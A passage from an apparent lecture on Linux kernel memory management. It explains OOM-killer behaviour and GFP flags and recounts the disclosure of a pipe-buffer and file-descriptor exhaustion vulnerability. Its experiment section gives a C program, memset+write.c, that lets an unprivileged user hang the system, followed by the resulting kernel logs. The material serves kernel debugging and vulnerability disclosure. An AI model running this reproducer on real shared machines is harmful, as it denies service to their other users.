---------- Example output of a hang up after OOM killer is invoked end ----------

At first, I suspected that this was a systemd-related problem. But it turned out that this problem tends to occur when xfs is used.

"Something unexpected is happening?"
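
The watermark observation noted in the log above (DMA32's free: below min:, yet no automatic OOM killer invocation) can be checked mechanically. The following is a minimal sketch in Python, assuming zone lines in the format printed by this 3.10 kernel; the function names `zone_watermarks` and `below_min` are made up for illustration, and the sample line is abbreviated from the log.

```python
import re

# Abbreviated copy of a "Node 0 DMA32" line from the log above.
ZONE_LINE = ("Node 0 DMA32 free:43436kB min:44668kB low:55832kB "
             "high:67000kB active_anon:14736kB free_cma:0kB")


def zone_watermarks(line):
    """Return the free/min/low/high values (in kB) found in a zone line."""
    # "free_cma:" is not matched because the name must be followed by ':'.
    fields = re.findall(r"\b(free|min|low|high):(\d+)kB", line)
    return {name: int(value) for name, value in fields}


def below_min(line):
    """True if the zone's free memory is below its min watermark."""
    marks = zone_watermarks(line)
    return marks["free"] < marks["min"]


if __name__ == "__main__":
    print(zone_watermarks(ZONE_LINE))
    print("below min watermark:", below_min(ZONE_LINE))
```

Feeding every "Node 0 DMA32 free:" line of a captured log to `below_min()` shows how long the zone stays under the min watermark without any further kill being reported.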


2.5 About uninterruptible in-kernel operations

I wrote "the SIGKILL signal cannot be ignored" in the explanation of the OOM killer. But to tell the truth, the kernel contains many "procedures which cannot be interrupted when a SIGKILL signal is delivered". This is because the kernel is a program which arbitrates resources between userspace programs and hardware, so aborting an operation as soon as a SIGKILL signal is received could leave things in an inconsistent state.

Some of these procedures are genuinely unkillable: they must run to completion in order to avoid an inconsistent state. But actually, there are also many "(essentially killable) procedures which could be interrupted when a SIGKILL signal is delivered, but which remain unkillable in order to simplify the code by eliminating error handling".
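
Both halves of this story can be observed from userspace. The following is a minimal sketch in Python with made-up helper names: `can_ignore()` shows that the kernel refuses a request to ignore SIGKILL, and `in_d_state()` reads the task state from /proc/<pid>/stat, where "D" is what tools like ps display for a task sleeping inside the kernel without accepting ordinary signals. Note that a task sleeping in a killable wait is also shown as "D", so "D" alone does not prove that SIGKILL will be delayed.

```python
import signal


def can_ignore(signum):
    """Try to ignore a signal; report whether the kernel accepted it."""
    try:
        previous = signal.signal(signum, signal.SIG_IGN)
    except OSError:
        return False                      # refused, e.g. for SIGKILL
    if previous is not None:
        signal.signal(signum, previous)   # restore the old disposition
    return True


def state_from_stat(stat_line):
    """Extract the state letter from the text of /proc/<pid>/stat.

    The command name is wrapped in parentheses and may itself contain
    spaces or parentheses, so split after the last ')'.
    """
    return stat_line[stat_line.rindex(")") + 1:].split()[0]


def in_d_state(pid):
    """True if the task is currently shown in state 'D' (Linux only)."""
    with open(f"/proc/{pid}/stat") as f:
        return state_from_stat(f.read()) == "D"


if __name__ == "__main__":
    print("SIGUSR1 can be ignored:", can_ignore(signal.SIGUSR1))
    print("SIGKILL can be ignored:", can_ignore(signal.SIGKILL))
```

A process that has been sent SIGKILL but stays in state "D" for a long time is a typical sign that it is stuck in one of the uninterruptible procedures described above.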


2.6 Then ···, the discussion about this vulnerability on the private ML bogged down.

Although I demonstrated that a system can be made to hang up using this vulnerability, the vulnerability was not taken seriously, and what I got were responses like "Your system is already DoS attacked and it is too late to recover. Give up and restart your system."

Also, since this vulnerability was considered a topic which should be discussed on public mailing lists, the discussion moved to public mailing lists in November 2014.

Since I am not good at discussions, I made the people involved angry many times.


2.7 What I did for the discussions on the public ML.

It is not a good idea to post, on public mailing lists, a reproducer program which exploits a not-yet-fixed vulnerability just to demonstrate that the system hangs up. Also, reproducing the hang up using this vulnerability might again lead to a reflexive response like "Your system is already DoS attacked and it is too late to recover."

Therefore, I posted many reproducer programs, developed by trial and error, which do not exploit this vulnerability. Also, I imposed a constraint on myself: a local unprivileged user must be able to reproduce the hang up with a finite amount of stress. This distinguishes the problem from simple overloading, which applies stress forever, and demonstrates that this hang up can occur on real systems.

But the discussion spread too widely, since this attempt uncovered too many problems. Therefore, I'd like to explain the ending of this vulnerability here.


2.8 The ending of this vulnerability 1

At the end of 2015, patches which mitigate this vulnerability were proposed on a public mailing list, and this vulnerability became public. The patches were then merged into Linux 4.5 (which was released in March 2016).

But since I gave the "Mitigates: CVE-2013-4312 (Linux 2.0+)" tag to both patches, which were posted at almost the same time, there was some confusion. As a result, an attack which exhausts all file descriptors using Unix domain sockets (which was discussed without assigning a CVE number) became CVE-2013-4312, and an attack which exhausts all kernel memory using pipe buffers (which was discussed as CVE-2013-4312) became CVE-2016-2847.

Anyway, the file descriptor exhaustion attack was solved, and the kernel memory exhaustion attack was mitigated to some degree.
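
To get a feeling for why pipe buffers are worth limiting, a rough back-of-the-envelope estimate helps. The following is a minimal sketch in Python under explicit assumptions: every pipe keeps the Linux default capacity of 65536 bytes (see pipe(7)), every pipe is completely filled, and each pipe costs two file descriptors. The function name and the example limits are hypothetical; real numbers depend on the resource limits and the kernel version in use.

```python
DEFAULT_PIPE_BYTES = 65536   # default pipe capacity on Linux, see pipe(7)


def pipe_buffer_estimate(max_fds, processes, pipe_bytes=DEFAULT_PIPE_BYTES):
    """Rough estimate (bytes) of kernel memory held by filled pipes.

    Assumes each process spends all of its file descriptors on pipes;
    each pipe needs two descriptors (read end and write end).
    """
    pipes_per_process = max_fds // 2
    return pipes_per_process * pipe_bytes * processes


if __name__ == "__main__":
    # Hypothetical limits: 1024 descriptors per process, 10 processes.
    total = pipe_buffer_estimate(1024, 10)
    print(f"{total // (1024 * 1024)} MiB")
```

With these hypothetical limits the estimate is 320 MiB, which is already a large fraction of the 1024MB or 2048MB of RAM in the target environment.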


2.9 The ending of this vulnerability 2

In May 2016, I noticed that a patch for tracking memory for pipe's buffer using kmemcg was (again) posted to public mailing lists. (I didn't notice that the first post was September 2015.)

"Huh? Wasn't memory used for pipe's buffer already tracked using kmemcg since Linux 3.8? We had been discussing this vulnerability based on that assumption."

Thus, I asked the author of the patch and got a reply: "Only memory for pipe's metadata was tracked using kmemcg. Memory for pipe's buffer (anonymous pipe buffer pages) was never tracked until now."

··· Wow! It turned out that the kmemcg, which was assumed to be the mitigation for this vulnerability, was hardly effective. Therefore, regarding this vulnerability, the disclaimer "unless resources are appropriately restricted using memory cgroup" did not hold true.

Now, (finally?) I'd like to get to the main point of this lecture.


Chapter 3   Basic knowledge for understanding the darkness of memory management subsystem


3.1 About process management in Linux

task_struct/thread_info

A data structure for managing processes/threads.
(Figure: task struct / thread struct)

signal_struct

A data structure for managing signals.
(Figure: signal struct)

mm_struct

A data structure for managing memory used by processes which run in userspace.
(Figure: mm struct)

thread and thread group (process)

Single process / single thread
(Figure: Single process)

Multi processes. Can be created by fork().
(Figure: Multi processes)

Honest multi threads. Can be created by clone() with CLONE_VM and CLONE_SIGHAND and CLONE_THREAD.
(Figure: Honest multi threads)

Twisted multi threads. Can be created by clone() with CLONE_VM but without CLONE_SIGHAND.
(Figure: Twisted multi threads)

Kernel threads

Basically does not have mm_struct.
(Figure: Kernel threads)

Workqueues

Queues implemented by kernel threads (for processing work items issued by various threads).
(Figure: Workqueues)


3.2 About memory management in Linux

· The buddy page allocator is used.

Memory is managed in units of "pages" of 4096 bytes, grouped by "order" into power-of-2 sizes: order-0 (for 1 byte to 4096 bytes), order-1 (for 4097 bytes to 8192 bytes), order-2 (for 8193 bytes to 16384 bytes) ···.

There is also the slab allocator for managing small fixed-size allocation requests, but I don't explain it because it is not important for this lecture.

· Some memory usage can be tracked, and some cannot.

The OOM killer does not take memory associated with file descriptors into account; it takes only memory associated with mm_struct into account.

This assumes that the majority of memory is associated with mm_struct. Therefore, if the system is hit by an attack which consumes all memory as pipe buffers using many file descriptors, the OOM killer ends up killing most of the innocent processes one by one.

The kmemcg, which is part of the memory cgroup functionality, can track memory used inside the kernel. The normal memory cgroup (which is not kmemcg) tracks memory associated with mm_struct.

· There are GFP (Get Free Page) flags.

When requesting free memory, the requester specifies a bitmask called GFP flags. This bitmask controls what actions are allowed for making free memory (e.g. reclaiming memory used for caching purposes) and how hard the kernel should try to reclaim memory. This is a world which memory allocation requests in userspace (e.g. malloc()) are not aware of.

· This is a nested subcontractor structure.

GFP_KERNEL
(__GFP_RECLAIM | __GFP_IO | __GFP_FS)

Mainly used by applications (contractors).

If needed, the kernel can perform fs writeback operations (reflecting changes to filesystems) thanks to the __GFP_FS flag, and/or storage I/O (read/write) operations thanks to the __GFP_IO flag.

GFP_NOFS
(__GFP_RECLAIM | __GFP_IO)

Mainly used by filesystems (subcontractors).

If needed, the kernel can perform storage I/O operations thanks to the __GFP_IO flag. But in order to avoid deadlocks, the kernel cannot perform fs writeback operations.

GFP_NOIO
(__GFP_RECLAIM)

Mainly used by device drivers (sub-sub contractors).

In order to avoid deadlocks, the kernel can perform neither fs writeback operations nor storage I/O operations.

· It is an unwinnable game: specifying wrong GFP flags leads to deadlock.

For example, if the __GFP_FS flag (which allows the kernel to perform fs writeback operations) is specified by mistake in a memory allocation request which occurs with filesystem locks held, there is a possibility of deadlock.

Also, no messages are printed when a deadlock actually occurs. It just looks as if the system hung up for no apparent reason.

· In addition to that, error handling is poor.

Since nobody actively tests the behavior under out of memory conditions, the error handling paths for memory allocation failure are hardly tested. Therefore, we can observe various strange behaviors if we intentionally make memory allocation requests fail.


3.3 About conditions for invoking OOM killer

· The kernel basically does not invoke the OOM killer for allocation requests of order-4 or larger (in other words, allocation requests which are larger than 32768 bytes) in order not to kill processes unnecessarily.

If such a memory allocation request is absolutely necessary, the requester can make the kernel invoke the OOM killer by specifying the __GFP_NOFAIL flag. But since there is a risk of terminating the majority of processes due to fragmentation of memory, vmalloc(), which allows large memory allocation requests at the cost of some performance penalty, is commonly used for large memory allocation requests instead of specifying __GFP_NOFAIL.

· The kernel basically does not invoke the OOM killer for GFP_NOFS allocation requests (subcontractors' requests) or GFP_NOIO allocation requests (sub-sub contractors' requests).

There might be memory which can be reclaimed if fs writeback operations are performed (i.e. by GFP_KERNEL requests). Therefore, in order to avoid killing processes prematurely, the kernel does not invoke the OOM killer unless the __GFP_FS flag or the __GFP_NOFAIL flag is specified.

· The OOM killer is basically kept disabled until the killed process releases its mm_struct.

Killing a process means that its working state is lost. Since the OOM killer reclaims memory by killing processes, it is expected not to kill more processes than needed. Therefore, the kernel uses the TIF_MEMDIE flag to indicate that "this process was terminated by the OOM killer".

By setting the TIF_MEMDIE flag on a process, the kernel behaves exceptionally in two ways.

Step 1: Before OOM situation occurs
Step 2: Immediately after OOM situation occurred
Step 3: The OOM killer kills a process
Step 4: Survive OOM situation by allocating from "memory reserves"
Step 5: Process releases mm_struct
Step 6: After OOM situation is resolved

3.4 About situations presenting ultimately tough choices

When an application performs asynchronous write requests to a file, the content to be written is cached in memory allocated by GFP_KERNEL allocation requests. Then, periodically or on an as-needed basis, the content is reflected to filesystems using memory allocated by GFP_NOFS allocation requests. And, when reflecting changes to filesystems, storage I/O operations are performed using memory allocated by GFP_NOIO allocation requests.

This means that, in order to satisfy GFP_KERNEL allocation requests (contractors' requests), GFP_NOFS allocation requests (subcontractors' requests) need to be satisfied. And, in order to satisfy GFP_NOFS allocation requests (subcontractors' requests), GFP_NOIO allocation requests (sub-sub contractors' requests) need to be satisfied.

But all of these allocation requests use the same watermark (the value of the min: level). In other words, when GFP_KERNEL allocation requests cannot be satisfied, GFP_NOFS and GFP_NOIO allocation requests cannot be satisfied either.

That is, if the kernel does not want to invoke the OOM killer for allocation requests from GFP_NOFS (subcontractors) and GFP_NOIO (sub-sub contractors), the kernel has no choice other than denying such allocation requests (i.e. fail such allocation requests), doesn't it?

But failing storage I/O because a sub-sub contractor's memory allocation failed results in damage to subcontractors (filesystem inconsistency). For example, if an ext4 filesystem encounters such a failure, the filesystem will be remounted read-only or will trigger a kernel panic.

Likewise, failing filesystem reads/writes because a subcontractor's memory allocation failed results in damage to contractors (applications). For example, the content written by asynchronous write requests will be lost.

Therefore, we don't want the kernel to readily deny subcontractors' / sub-sub contractors' allocation requests just because it does not invoke the OOM killer for them ···.


Chapter 4   An affair which exposed contradiction in memory management subsystem


4.1 What happens if ultimately tough choices are actually presented?

It seems that we can reproduce such a situation by concurrently running a process which consumes all memory using malloc() + memset() and processes which consume a little memory by doing asynchronous file writes.

Experiment: What will happen if OOM situation occurred while writing to a file?

---------- memset+write.c ----------
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
        unsigned long size;
        char *buf = NULL;
        unsigned long i;
        /* Start 10 child processes which keep appending to a file. */
        for (i = 0; i < 10; i++) {
                if (fork() == 0) {
                        static char buf[4096];
                        const int fd = open("/tmp/file", O_CREAT | O_WRONLY |
                                            O_APPEND, 0600);
                        /* Keep writing 4096 bytes at a time until a write fails. */
                        while (write(fd, buf, sizeof(buf)) == sizeof(buf));
                        pause();
                        _exit(0);
                }
        }
        /* Grow the buffer by doubling until realloc() fails. */
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(5);
        /* Will cause OOM due to overcommit */
        /* Touch one byte per 4096 bytes so that every page gets allocated. */
        for (i = 0; i < size; i += 4096)
                buf[i] = 0;
        pause();
        return 0;
}
---------- memset+write.c ----------

Result: The system hung up.

---------- Example output start ----------
[   67.776733] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   67.778409] memset+write cpuset=/ mems_allowed=0
[   67.779310] CPU: 1 PID: 4158 Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1
[   67.780988] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   67.783002]  ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c
[   67.784679]  ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768
[   67.786253]  0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f
[   67.788065] Call Trace:
[   67.788645]  [<ffffffff81635a0c>] dump_stack+0x19/0x1b
[   67.789606]  [<ffffffff816309ac>] dump_header+0x8e/0x214
[   67.790620]  [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0
[   67.791957]  [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0
[   67.793085]  [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0
[   67.794515]  [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30
[   67.795730]  [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0
[   67.796792]  [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90
[   67.798004]  [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140
[   67.799125]  [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50
[   67.800228]  [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900
[   67.801479]  [<ffffffff816416c0>] __do_page_fault+0x150/0x450
[   67.802749]  [<ffffffff816419e3>] do_page_fault+0x23/0x80
[   67.803803]  [<ffffffff8163dc48>] page_fault+0x28/0x30
[   67.804805] Mem-Info:
[   67.805259] Node 0 DMA per-cpu:
[   67.806084] CPU    0: hi:    0, btch:   1 usd:   0
[   67.807042] CPU    1: hi:    0, btch:   1 usd:   0
[   67.807971] CPU    2: hi:    0, btch:   1 usd:   0
[   67.809149] CPU    3: hi:    0, btch:   1 usd:   0
[   67.810041] Node 0 DMA32 per-cpu:
[   67.810743] CPU    0: hi:  186, btch:  31 usd:  32
[   67.811942] CPU    1: hi:  186, btch:  31 usd:   0
[   67.812860] CPU    2: hi:  186, btch:  31 usd: 211
[   67.813691] CPU    3: hi:  186, btch:  31 usd:  50
[   67.814633] active_anon:385124 inactive_anon:2096 isolated_anon:0
[   67.814633]  active_file:6184 inactive_file:9766 isolated_file:0
[   67.814633]  unevictable:0 dirty:552 writeback:9326 unstable:0
[   67.814633]  free:15848 slab_reclaimable:4962 slab_unreclaimable:5615
[   67.814633]  mapped:5933 shmem:2161 pagetables:2108 bounce:0
[   67.814633]  free_cma:0
[   67.822567] Node 0 DMA free:7432kB min:400kB low:500kB high:600kB active_anon:7240kB inactive_anon:0kB active_file:200kB inactive_file:148kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:204kB mapped:184kB shmem:0kB slab_reclaimable:112kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:27 all_unreclaimable? no
[   67.831956] lowmem_reserve[]: 0 1720 1720 1720
[   67.833707] Node 0 DMA32 free:53824kB min:44652kB low:55812kB high:66976kB active_anon:1533256kB inactive_anon:8384kB active_file:24536kB inactive_file:40900kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:1840kB writeback:39308kB mapped:23548kB shmem:8644kB slab_reclaimable:19736kB slab_unreclaimable:22300kB kernel_stack:6528kB pagetables:8140kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:448 all_unreclaimable? no
[   67.844988] lowmem_reserve[]: 0 0 0 0
[   67.846636] Node 0 DMA: 22*4kB (UEM) 13*8kB (UEM) 11*16kB (UEM) 4*32kB (UEM) 2*64kB (EM) 1*128kB (E) 2*256kB (UM) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7408kB
[   67.851731] Node 0 DMA32: 941*4kB (UE) 693*8kB (UEM) 270*16kB (UEM) 216*32kB (UE) 117*64kB (UEM) 52*128kB (UEM) 27*256kB (UEM) 8*512kB (EM) 3*1024kB (M) 1*2048kB (M) 0*4096kB = 50812kB
[   67.857304] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   67.859927] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   67.862160] 19726 total pagecache pages
[   67.863651] 0 pages in swap cache
[   67.865041] Swap cache stats: add 0, delete 0, find 0/0
[   67.866736] Free swap  = 0kB
[   67.868016] Total swap = 0kB
[   67.869295] 524157 pages RAM
[   67.870684] 0 pages HighMem/MovableOnly
[   67.872163] 79320 pages reserved
[   67.873467] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[   67.875840] [  588]     0   588     9204      680      19        0             0 systemd-journal
[   67.878421] [  604]     0   604    10814      485      21        0         -1000 systemd-udevd
[   67.878422] [  912]     0   912    12803      451      25        0         -1000 auditd
[   67.878424] [ 1967]    70  1967     6997      389      18        0             0 avahi-daemon
[   67.878425] [ 1979]     0  1979    72391     1429      42        0             0 rsyslogd
[   67.878426] [ 1982]     0  1982    80896     5753      78        0             0 firewalld
[   67.878427] [ 1983]     0  1983     4829      316      14        0             0 irqbalance
[   67.878428] [ 1984]     0  1984     6612      435      15        0             0 systemd-logind
[   67.878429] [ 1985]    81  1985     6672      465      18        0          -900 dbus-daemon
[   67.878430] [ 1990]    70  1990     6997       58      17        0             0 avahi-daemon
[   67.878431] [ 2015]     0  2015    52593     1356      56        0             0 abrtd
[   67.878433] [ 2017]     0  2017    51993     1133      54        0             0 abrt-watch-log
[   67.878434] [ 2018]     0  2018     1094      148       8        0             0 rngd
[   67.878435] [ 2044]     0  2044    31583      393      21        0             0 crond
[   67.878436] [ 2181]     0  2181    46752     1141      41        0             0 vmtoolsd
[   67.878438] [ 2803]     0  2803    27631     3192      51        0             0 dhclient
[   67.878439] [ 2807]   999  2807   132051     3450      54        0             0 polkitd
[   67.878440] [ 2890]     0  2890    20640      900      40        0         -1000 sshd
[   67.878441] [ 2893]     0  2893   138262     4089      91        0             0 tuned
[   67.878442] [ 4096]     0  4096    22785      519      42        0             0 master
[   67.878443] [ 4102]     0  4102    64751     2099      57        0          -900 abrt-dbus
[   67.878445] [ 4108]     0  4108    23201      674      51        0             0 login
[   67.878445] [ 4109]     0  4109    27509      214      12        0             0 agetty
[   67.878446] [ 4113]     0  4113    79455      691     104        0             0 nmbd
[   67.878447] [ 4115]    89  4115    22811      976      44        0             0 pickup
[   67.878448] [ 4116]    89  4116    22828      984      45        0             0 qmgr
[   67.878450] [ 4130]     0  4130    96508     1392     138        0             0 smbd
[   67.878451] [ 4134]     0  4134    96508      735     132        0             0 smbd
[   67.878452] [ 4137]  1000  4137    28884      534      14        0             0 bash
[   67.878454] [ 4158]  1000  4158   541715   366511     725        0             0 memset+write
[   67.878455] [ 4159]  1000  4159     1042       21       6        0             0 memset+write
[   67.878456] [ 4160]  1000  4160     1042       21       6        0             0 memset+write
[   67.878457] [ 4161]  1000  4161     1042       21       6        0             0 memset+write
[   67.878458] [ 4162]  1000  4162     1042       21       6        0             0 memset+write
[   67.878459] [ 4163]  1000  4163     1042       21       6        0             0 memset+write
[   67.878460] [ 4164]  1000  4164     1042       21       6        0             0 memset+write
[   67.878461] [ 4165]  1000  4165     1042       21       6        0             0 memset+write
[   67.878461] [ 4166]  1000  4166     1042       21       6        0             0 memset+write
[   67.878462] [ 4167]  1000  4167     1042       21       6        0             0 memset+write
[   67.878463] [ 4168]  1000  4168     1042       21       6        0             0 memset+write
[   67.878464] Out of memory: Kill process 4158 (memset+write) score 825 or sacrifice child
[   67.878467] Killed process 4159 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB
[   68.333885] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   68.335891] memset+write cpuset=/ mems_allowed=0
[   68.337124] CPU: 0 PID: 4158 Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1
[   68.339035] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   68.341410]  ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c
[   68.343326]  ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768
[   68.345256]  0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f
[   68.347163] Call Trace:
[   68.348064]  [<ffffffff81635a0c>] dump_stack+0x19/0x1b
[   68.349439]  [<ffffffff816309ac>] dump_header+0x8e/0x214
[   68.350859]  [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0
[   68.352320]  [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0
[   68.353847]  [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0
[   68.355373]  [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30
[   68.357016]  [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0
[   68.358503]  [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90
[   68.360124]  [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140
[   68.361635]  [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50
[   68.363147]  [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900
[   68.364612]  [<ffffffff816416c0>] __do_page_fault+0x150/0x450
[   68.366144]  [<ffffffff816419e3>] do_page_fault+0x23/0x80
[   68.367616]  [<ffffffff8163dc48>] page_fault+0x28/0x30
[   68.369019] Mem-Info:
[   68.369890] Node 0 DMA per-cpu:
[   68.370979] CPU    0: hi:    0, btch:   1 usd:   0
[   68.372543] CPU    1: hi:    0, btch:   1 usd:   0
[   68.373900] CPU    2: hi:    0, btch:   1 usd:   0
[   68.375258] CPU    3: hi:    0, btch:   1 usd:   0
[   68.376576] Node 0 DMA32 per-cpu:
[   68.377683] CPU    0: hi:  186, btch:  31 usd:   0
[   68.379041] CPU    1: hi:  186, btch:  31 usd:   0
[   68.380402] CPU    2: hi:  186, btch:  31 usd:   0
[   68.381744] CPU    3: hi:  186, btch:  31 usd:  33
[   68.383107] active_anon:404397 inactive_anon:2096 isolated_anon:0
[   68.383107]  active_file:82 inactive_file:0 isolated_file:0
[   68.383107]  unevictable:0 dirty:2 writeback:64 unstable:0
[   68.383107]  free:12956 slab_reclaimable:4712 slab_unreclaimable:5666
[   68.383107]  mapped:489 shmem:2161 pagetables:2146 bounce:0
[   68.383107]  free_cma:0
[   68.391582] Node 0 DMA free:7272kB min:400kB low:500kB high:600kB active_anon:7948kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:40kB mapped:16kB shmem:0kB slab_reclaimable:52kB slab_unreclaimable:164kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[   68.400580] lowmem_reserve[]: 0 1720 1720 1720
[   68.402208] Node 0 DMA32 free:44552kB min:44652kB low:55812kB high:66976kB active_anon:1609640kB inactive_anon:8384kB active_file:328kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:8kB writeback:216kB mapped:1940kB shmem:8644kB slab_reclaimable:18796kB slab_unreclaimable:22500kB kernel_stack:6528kB pagetables:8292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2005 all_unreclaimable? yes
[   68.412886] lowmem_reserve[]: 0 0 0 0
[   68.414465] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[   68.419424] Node 0 DMA32: 910*4kB (UEM) 568*8kB (UEM) 153*16kB (UEM) 151*32kB (UE) 94*64kB (UEM) 58*128kB (UEM) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44776kB
[   68.424683] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   68.427106] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   68.429457] 2258 total pagecache pages
[   68.430956] 0 pages in swap cache
[   68.432384] Swap cache stats: add 0, delete 0, find 0/0
[   68.434187] Free swap  = 0kB
[   68.435545] Total swap = 0kB
[   68.436865] 524157 pages RAM
[   68.438225] 0 pages HighMem/MovableOnly
[   68.439698] 79320 pages reserved
[   68.441072] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[   68.443320] [  588]     0   588     9204      395      19        0             0 systemd-journal
[   68.445710] [  604]     0   604    10814      176      21        0         -1000 systemd-udevd
[   68.448100] [  912]     0   912    12803      122      25        0         -1000 auditd
[   68.450370] [ 1967]    70  1967     6997       63      18        0             0 avahi-daemon
[   68.452736] [ 1979]     0  1979    72391      926      42        0             0 rsyslogd
[   68.455063] [ 1982]     0  1982    80896     4270      78        0             0 firewalld
[   68.457297] [ 1983]     0  1983     4829       87      14        0             0 irqbalance
[   68.459638] [ 1984]     0  1984     6612       86      15        0             0 systemd-logind
[   68.462043] [ 1985]    81  1985     6672      128      18        0          -900 dbus-daemon
[   68.464379] [ 1990]    70  1990     6997       58      17        0             0 avahi-daemon
[   68.466708] [ 2015]     0  2015    52593      433      56        0             0 abrtd
[   68.468963] [ 2017]     0  2017    51993      352      54        0             0 abrt-watch-log
[   68.471530] [ 2018]     0  2018     1094       24       8        0             0 rngd
[   68.473807] [ 2044]     0  2044    31583      155      21        0             0 crond
[   68.476153] [ 2181]     0  2181    46752      262      41        0             0 vmtoolsd
[   68.478435] [ 2803]     0  2803    27631     3114      51        0             0 dhclient
[   68.480782] [ 2807]   999  2807   132051     2260      54        0             0 polkitd
[   68.483093] [ 2890]     0  2890    20640      222      40        0         -1000 sshd
[   68.485357] [ 2893]     0  2893   138262     2668      91        0             0 tuned
[   68.487615] [ 4096]     0  4096    22785      252      42        0             0 master
[   68.489912] [ 4102]     0  4102    64751     1000      57        0          -900 abrt-dbus
[   68.492253] [ 4108]     0  4108    23201      170      51        0             0 login
[   68.494525] [ 4109]     0  4109    27509       37      12        0             0 agetty
[   68.496785] [ 4113]     0  4113    79455      358     104        0             0 nmbd
[   68.499056] [ 4115]    89  4115    22811      253      44        0             0 pickup
[   68.501186] [ 4116]    89  4116    22828      250      45        0             0 qmgr
[   68.503333] [ 4130]     0  4130    96508      528     138        0             0 smbd
[   68.505438] [ 4134]     0  4134    96508      528     132        0             0 smbd
[   68.507535] [ 4137]  1000  4137    28884      134      14        0             0 bash
[   68.509598] [ 4158]  1000  4158   541715   385692     763        0             0 memset+write
[   68.511764] [ 4160]  1000  4160     1042       21       6        0             0 memset+write
[   68.513959] [ 4161]  1000  4161     1042       21       6        0             0 memset+write
[   68.515999] [ 4162]  1000  4162     1042       21       6        0             0 memset+write
[   68.518104] [ 4163]  1000  4163     1042       21       6        0             0 memset+write
[   68.520170] [ 4164]  1000  4164     1042       21       6        0             0 memset+write
[   68.522145] [ 4165]  1000  4165     1042       21       6        0             0 memset+write
[   68.524082] [ 4166]  1000  4166     1042       21       6        0             0 memset+write
[   68.526037] [ 4167]  1000  4167     1042       21       6        0             0 memset+write
[   68.527964] [ 4168]  1000  4168     1042       21       6        0             0 memset+write
[   68.529921] Out of memory: Kill process 4158 (memset+write) score 868 or sacrifice child
[   68.531913] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB
(Since no response, I pressed SysRq-m in order to show memory state.)
[  104.136563] SysRq : Show Memory
[  104.137695] Mem-Info:
[  104.138539] Node 0 DMA per-cpu:
[  104.139591] CPU    0: hi:    0, btch:   1 usd:   0
[  104.141033] CPU    1: hi:    0, btch:   1 usd:   0
[  104.142328] CPU    2: hi:    0, btch:   1 usd:   0
[  104.143600] CPU    3: hi:    0, btch:   1 usd:   0
